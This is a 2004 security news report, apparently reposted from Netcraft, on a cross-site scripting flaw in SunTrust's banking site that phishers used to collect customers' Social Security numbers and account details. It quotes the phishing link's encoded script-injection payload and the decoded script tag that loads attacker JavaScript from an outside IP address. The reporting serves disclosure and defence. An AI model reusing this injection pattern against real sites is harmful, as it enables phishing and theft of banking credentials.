SecurityTeam US Contribute  :  Advanced Search  :  Web Resources  :  Polls  :  File Repository  
 
advanced search  
Poll
What would you like to see on SecurityTeamUS?
More News
Product Reviews
HowTo's
Custom RPM/Packages/Tools
Other (Please leave comment)
Results
96 votes | 0 comments
Topics
Home
Apache
Apple
Application Software
Cisco Systems
Database Servers
Internet Explorer
Linux
Macromedia
Microsoft
Mozilla/Firefox
Phishing/ID Theft
Real Networks
Security News
Sun Microsystems
Web Appliances/Devices
Web Scripts
Wi-Fi
Virus Alerts
Events
There are no upcoming events
 Welcome to SecurityTeam US
 Monday, February 06 2012 @ 12:09 PM EST

SunTrust Site Exploited by Fraudsters

    
Thursday, December 09 2004 @ 09:57 PM EST

Phishing/ID TheftA facility in SunTrust Bank's www.suntrust.com web site is allowing fraudsters to inject their own code into the site to obtain SunTrust customer account authentication details, and at least one fraudster has exploited this error by sending large numbers of electronic mails purporting to be from SunTrust, asking the user to confirm their bank account on his form, executed from SunTrust's web site.

This makes the fraud much more convincing than traditional phishing mails, as the url the SunTrust customer clicks on actually runs from the SunTrust site before loading JavaScript from the fraudsters server, located in Korea.

The JavaScript then changes the title of the page to "Suntrust Online Banking - Account Verification" and sets the window status to "Suntrust Online Banking", thereby preventing suspicious URLs from being displayed when the victim hovers their mouse cursor over a hyperlink. An 'iframe' is used to insert a form onto the page, which asks the customer to enter their Social Security number and SunTrust banking details. When the form is submitted, it is processed by a PHP script, allowing the attacker to capture the account details.

The phishing emails received by Netcraft contain the following HTML to create a hyperlink to the SunTrust web site:

<a href="http://www.suntrust.com/onlinestatements/index.asp?AccountVerify=df4g653432fvfdsGFSg45wgSVFwfvfVDFS54v54g5F42f543ff5445wv54w
&promo=%22%3E%3Cscript+language%3Djavascript+src%3D%22http%3A%2F%2F%3211%2E1%375%2E176%2E179%2Fsun%2Fsun%2Ejs%22%3E%3C%2FSCRIPT%3E)
http://www.suntrust.com/onlinestatements/index.asp?AccountVerify=df4g653432fvfdsGFSg45wgSVFwfvfVDFS54v54g5F42f543ff5445wv54w
&promo=%22%3E%3Cscript+language%3Djavascript+src%3D%22http%3A%2F%2F%3211%2E1%375%2E176%2E179%2Fsun%2Fsun%2Ejs%22%3E%3C%2FSCRIPT%3E" 
target="_blank">click here.</td></tr></table></a>

One of the parameters supplied to the page is not properly encoded when the SunTrust site displays it, which allows an attacker to inject arbitrary HTML, including JavaScript which is executed by customers' web browsers. The highlighted portion of the URL, which unneccessarily appears twice, causes the following script to be inserted into the page:

<script language=javascript src="http://211.175.176.179/sun/sun.js">

  </SCRIPT>

This in turn executes the JavaScript which is responsible for altering the contents of the page.

Fraudsters have noticed opportunities in SunTrust's internet banking operations previously, and a similar attack was executed in September.

Careless application errors and inadequate testing are believed to be an industry wide problem for internet banking, and even though it would seem to the man in the street appalling that someone could run a fraud from a bank's own site, SunTrust competitors are unlikely to be strongly critical through fear of similar problems with their own facilities.

Netcraft News

 
What's Related

Story Options

SunTrust Site Exploited by Fraudsters | 0 comments | Create New Account
The following comments are owned by whomever posted them. This site is not responsible for what they say.
 Copyright © 2012 SecurityTeam US
 All trademarks and copyrights on this page are owned by their respective owners.		   Get Firefox!
Dedicated Servers
Created this page in 0.15 seconds